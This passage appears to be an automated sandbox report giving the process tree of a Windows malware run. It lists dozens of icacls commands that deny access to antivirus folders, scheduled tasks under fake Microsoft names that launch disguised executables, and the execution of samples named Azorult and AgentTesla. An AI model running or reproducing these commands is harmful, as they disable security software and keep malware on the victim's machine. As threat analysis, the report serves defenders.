C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVG" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Norton" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Norton" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Kaspersky Lab Setup Files" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\grizzly" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Cezurity" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny %username%:(OI)(CI)(F)3⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\Avira" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny %username%:(OI)(CI)(F)3⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny Admin:(OI)(CI)(F)4⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 13⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST3⤵
- Scheduled Task/Job: Scheduled Task
-
-
-
C:\Users\Admin\Downloads\Azorult.exe"C:\Users\Admin\Downloads\Azorult.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1148 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7000 /prefetch:82⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7020 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Users\Admin\Downloads\AgentTesla.exe"C:\Users\Admin\Downloads\AgentTesla.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5704 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4880 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5672 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\Apex.exe"C:\Users\Admin\Downloads\Apex.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7072 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3340 /prefetch:82⤵
- Subvert Trust Controls: Mark-of-the-Web Bypass
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5816 /prefetch:82⤵
-
-
C:\Users\Admin\Downloads\QuikNEZUpdater.exe"C:\Users\Admin\Downloads\QuikNEZUpdater.exe"2⤵
- Executes dropped EXE
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6912 /prefetch:82⤵
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6716 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6600 /prefetch:82⤵
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4704 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6888 /prefetch:82⤵
- NTFS ADS
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6692 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7156 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6528 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1412 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3120 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5484 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6732 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:12⤵
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1956,14143768268571226968,1783610477646422165,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7240 /prefetch:12⤵
-
-
